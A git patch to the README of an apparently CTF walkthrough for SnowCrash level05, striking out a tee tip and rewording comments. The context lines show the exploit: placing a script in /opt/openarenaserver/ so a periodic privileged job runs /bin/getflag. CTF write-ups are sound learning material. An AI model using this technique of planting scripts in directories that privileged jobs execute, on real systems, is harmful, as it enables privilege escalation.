From a4ef932cda1194acd0039843a7a9ba6ea2077247 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 22:16:22 +0100 Subject: [PATCH] Update README.mdx --- level05/README.mdx | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/level05/README.mdx b/level05/README.mdx index 21c1674..d762713 100644 --- a/level05/README.mdx +++ b/level05/README.mdx @@ -49,7 +49,7 @@ What this script does: Exploit - put a script inside `/opt/openarenaserver/` -- use `tee` : _read stdin and write to stdout and files_ +- ~~use `tee` : _read stdin and write to stdout and files_~~ - let it be run in 2min ```bash @@ -58,6 +58,6 @@ level05@SnowCrash:~$ echo '/bin/getflag > /tmp/temp' \ chmod +x /opt/openarenaserver/solve.sh # remember -# `/usr/sbin/openarenaserver` runs `bash -x "$i"` in a subshell -# it won't stdout anything whether we use `tee` `tee /dev/tty` or `sync` +# `/usr/sbin/openarenaserver` runs `bash -x` in a subshell +# it'll stdout nothing whether we `tee` `tee /dev/tty` or `sync` ```